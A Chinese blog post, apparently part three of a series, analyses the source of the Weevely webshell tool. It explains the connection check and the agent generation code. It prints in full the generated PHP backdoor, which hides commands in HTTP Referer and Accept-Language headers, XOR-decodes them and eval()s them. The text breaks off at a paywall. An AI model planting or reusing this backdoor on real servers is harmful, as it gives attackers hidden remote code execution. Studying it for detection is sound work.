Weevely使用及源码分析(三)

最新推荐文章于 2024-06-18 13:31:45 发布
最新推荐文章于 2024-06-18 13:31:45 发布
阅读量1.7k 收藏
点赞数 2
分类专栏: Weevely 文章标签: weevely php 后门 源码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yaofeiNO1/article/details/54409692
版权

1 weevely验证机制分析

1.1 源码分析

   当生成的php文件是以stegaref_php.tpl文件为模板时,当我们在连接时的命令行中输入任意命运就可以触发php.py文件中的_check_interpreter()函数,_check_interpreter()函数主要功能是随机生成一个命令,”echo”一个从11111到99999大小的随机整数,然后分别调用channels文件夹下的channel.py文件中的”send()”函数,然后在send()函数中把payload分别发送给legacycookie.py,legacyreferrer.py和stegaref.py三个Python文件中的”send()”函数同时返回Response,code,error的值, response, code, error = channel.send(command),通过对返回的Response和构造的echo的随机数是否相等来进行判断PHP shell能否直接运行,同时判断连接是否成功。

1.2 PHP(stegaref_php.tpl模板)后门文件分析

   首先,当我们使用命令:weevely generate hello /var/www/html/testformd.php来生成木马文件时,会调用generate()函数来生成木马。

  1. generate()函数在weevely3-master/core/generate.py文件中,函数原型为: def generate(password, obfuscator = 'obfusc1_php', agent = 'stegaref_php'):其中,password为用户指定的密码, obfuscator是使用的webshell模糊变换模板,agent为webshell的模板,后两个参数均可自己定义,用户可以自己编写自定义的模板放入weevely3-master/bd/obfuscator/和weevely3-master/bd/agent/目录下,然后命令中指定自定义的模板。
  2. agent = Template(open(agent_path,'r').read()).render(password=password)render agent模板文件,得到原始的webshell。webshell源码通过pycharm debug出来,生成的源码为:
 $kh="5d41";
        $kf="402a";

        function x($t,$k){
            $c=strlen($k);
            $l=strlen($t);
            $o="";
            for($i=0;$i<$l;){
                for($j=0;($j<$c&&$i<$l);$j++,$i++)
                {
                    $o.=$t{
  $i}^$k{
  $j};
                }
            }
            return $o;
        }

        $r=$_SERVER;
        $rr=@$r["HTTP_REFERER"];
        $ra=@$r["HTTP_ACCEPT_LANGUAGE"];

        if($rr&&$ra){
            $u=parse_url($rr);
            parse_str($u["query"],$q);
            $q=array_values($q);
            preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);

            if($q&&$m){
                @session_start();

                $s=&$_SESSION;
                $ss="substr";
                $sl="strtolower";

                $i=$m[1][0].$m[1][1];
                $h=$sl($ss(md5($i.$kh),0,3));
                $f=$sl($ss(md5($i.$kf),0,3));

                $p="";
                for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];

                if(strpos($p,$h)===0){
                    $s[$i]="";
                    $p=$ss($p,3);
                }

                if(array_key_exists($i,$s)){

                    $s[$i].=$p;

                    $e=strpos($s[$i],$f);
                    if($e){
                        $k=$kh.$kf;
                        ob_start();
                        @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
                        $o=ob_get_contents();
                        ob_end_clean();
                        $d=base64_encode(x(gzcompress($o),$k));
                        print("<$k>$d</$k>");
                        @session_destroy();
                    }
                }
            }
        }
  1. minified_agent = utils.code.minify_php(agent)对原始的webshell进行”净化”操作,去除里面”\n\t”等特殊字符。处理完的源码为:
$kh=
最低0.47元/天 解锁文章
fly小灰灰
关注
专栏目录
weevely使用教程
xiongIT的博客
10-30 516
weevely 是一款基于 python 编写的 webshell 生成、管理工具。
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 286
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Weevely使用源码分析(二)
fly小灰灰的专栏
01-30 2825
1. 定义(术语、名词解释)    客户端:运行Weevely进程的计算机。    服务端:存有PHP木马的服务器。 2. 协议交互流程    在客户端,Weevely每执行一条命令就通过HTTP协议发出一条GET/POST请求;在服务端,木马针对每条GET/POST请求作出响应,产生一条响应包。 3. 数据包及源码分析    通过对源代码进行走读以及wireshark进行抓包分
实战Webshell管理工具Weevely检测思路分析
最新发布
2401_84466336的博客
06-18 937
近日,新华盾山实验室在实战演练防守中发现一次使用Weevely攻击的事件,攻击者使用混淆的webshell绕过了安全设备检测,成功上传了恶意文件并Getshell。通过查看目标主机中的webshell木马文件,发现其混淆程度较高,通过特征不好检测,现通过分析其上线流量方式寻找有效的识别方法。Weevely是一款基于Python语言开发的渗透测试工具,主要用于在目标主机上执行远程操作,类似中国菜刀。本篇文章主要介绍Weevely上线流量分析与识别、Weevely后门文件识别、Weevely加解密方法。
weevely使用小结
weixin_52268949的博客
01-27 509
Weevely 写在前面 由于比赛不确定会不会提供菜刀或者蚁剑,这里我稍微对weevely进行简单介绍一下,具体还是请看官方文档,官方文档讲的很详细(前提你英语嘚不错) 官方文档:https://github.com/epinna/weevely3/wiki/Getting-Started 一般几个步骤就如下 1、在终端输入weevely查看基本使用方法 2、generate一个后门代理(backdoor agent) weevely会给你自动生成,不用自己写。我这里是默认存在/root/agent.ph
weevely的使用及免杀(Linux中的菜刀)
realmels的博客
07-31 2583
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件.
weevely工具使用
淡巴枯的博客
05-23 6732
weevely工具使用 目录一. 关于weevely二. 安装weevely使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
Weevely使用源码分析(一)
fly小灰灰的专栏
01-30 2533
1. 简介 1.1 前言    weevely 是一款使用python编写的webshell工具(集webshell生成和连接于一身),采用C/S模式构建,可以算作是linux下的一款菜刀替代工具(限于PHP),具有很好的隐蔽性,在Linux下具有: 服务器配置审计 后门放置 暴力破解 文件管理 资源搜索 网络代理 命令执行 系统信息收集 端口扫描等功能 1.2 测试环境
亲测WAF防御能力评测及工具
weixin_49440873的博客
07-17 922
某网站后台可以编辑网站模板,但不存在上传漏洞,由于JSP 的content-type 类型为 text/html,故利用这个特性 采用html中的Unicode 16进制编码成功上传。 <%@ page import=“java.util.,java.io.,java.net.*”%> <%@ page import="java.util.*,java.io.*,java.net.*"%> <% \u0069\u0066\u0020\u0028\u0072\u0065\u00
weevely详细使用教程
热门推荐
星落的博客
05-12 2万+
weevely简介 weevely常用命令 weevely主页面 实例演示 到此就完成了weevely的介绍,如果想了解更多的Kali工具,请关注我!
Shelly:带Python的简单后门管理器(基于weevely)
02-05
雪莉| 使用Python的简单后门管理器(基于weevely) Shelly是使用Python编写的简单工具,其功能是远程访问网站 安装: $ git clone $ cd雪莉$ python3 shell.py 要求 : sudo pip install -r requirements.txt 范例: python3 shell.py -g wp-log -p tegal1337 ______ ____ / __/ / ___ / / __ __ _\ \/ _ / -_/ / / // / /___/_//_\__/_/_/\_, /
weevely3.3.1:Weevely旧版本(3.3.1)
03-25
韦韦利 Weevely是一个命令行Web Shell,可在运行时通过网络动态扩展,旨在用于远程管理和渗透测试。 它提供了一个类似ssh的终端,即使在受限的环境中,也只需将PHP脚本拖放到目标服务器上。 低资源占用的代理程序和30多个模块构成了一个可扩展的框架,用于管理Web帐户并发布漏洞利用Web服务器以提升特权并在网络中横向移动。 阅读中的教程和用例。 模块功能: 类SSH终端 在目标上运行SQL控制台透视 代理以目标为中心的HTTP流量 主机配置安全审核 在本地挂载目标文件系统 进行以目标为中心的网络扫描 文件上传下载 生成反向和直接TCP Shell Bruteforce内部服务 管理压缩档案 后门代理 远程代理是一个小PHP脚本,可以在运行时通过网络扩展其功能。 代理代码是多态的,几乎无法被AV检测到,并且流量在HTTP请求中被混淆。 模块开发 Weevely还提供了py
weevely3:武器化的Web外壳
04-05
韦韦利 姓名 Weevely-武器化的Web Shell 用法 weevely generate <password> <path> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标Web服务器以获得对它的远程Shell访问。 它具有30多个模块,可协助管理任务,维护访问,提供态势感知,提升特权并传播到目标网络。 阅读“页面以安装weevely及其依赖项。 阅读“页面以生成代理并连接到它。 浏览以阅读示例和用例。 特征 Shell访问目标 以目标为中心SQL控制台 HTTP / HTTPS代理浏览目标 上传和下载文件 生成反向和直接TCP Shell 审核远程目标安全 端口扫描以目标为中心 挂载远程文件系统 以目标为中心的Brute
Weevely(Linux中的菜刀)
qq_45521281的博客
06-06 8095
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 文章目录基本用法后门生成连接后门weevely模块几个模块的使用::shell_su模块:system_info模块:audit_disablefunctionbypass模块:audit_etcpasswd模块:backdoor_reversetcp模块:audit.phpconf使用技巧获取其他用户的凭据绕过策略读取/etc/passwd猜解SQL用户凭据日志清理绕过系统禁用函
kali linux下的weevely 的使用
young‘s blog
07-11 1949
weevely是kali linux中一个管理工具,通过后门连接。 可以生成后门,可以通过后门连接上。并且会对产生的后门进行一些免杀的编写,但是免杀效果咋样还需要测试一下。 ...
Weevely(php菜刀)工具使用简介
RickGray
08-02 2740
Weevely工具使用记录 -前言 weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。 项目地址:https://github.com/epinna/Weevely 下面就针
Weevely工具使用详解 (Linux菜刀)
weixin_45116657的博客
04-10 2799
一、下载与安装 下载地址:https://github.com/epinna/weevely3 下载之后解压,使用里面的weevely.py 在kali中国 ...
Weevely
Nixawk
07-31 2008
Weevely 出现已经有一段时间了, 今天
Kali Linux中Dmitry与Weevely的使用教程
、Weevely的使用步骤 1. 在Kali Linux终端启动Weevely。 2. 使用`weevely generate 密码 路径 文件名`生成一个PHP Webshell。例如,`weevely generate passwd /tmp/1.php`会生成一个名为`1.php`的后门,密码设定为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值